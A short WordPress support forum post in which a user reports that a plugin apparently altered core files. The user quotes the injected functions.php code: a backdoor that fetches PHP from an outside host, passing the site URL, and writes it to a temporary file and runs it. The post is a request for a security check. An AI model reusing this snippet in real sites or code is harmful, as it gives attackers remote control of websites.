Hacked Version
-
Hi everyone,
when install and active your plugin, my site alert me suspicious file write in wp-includes and functions.php modified.
for example: wp-includes/class.wp.php
functions.php add this and other line:
if ( ! function_exists( 'theme_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { if($tmpcontent = @file_get_contents("http://www.spekt.cc/code2.php?i=".$path)) { function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); }Please, you can check the security integrity?
Best regards
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
The topic ‘Hacked Version’ is closed to new replies.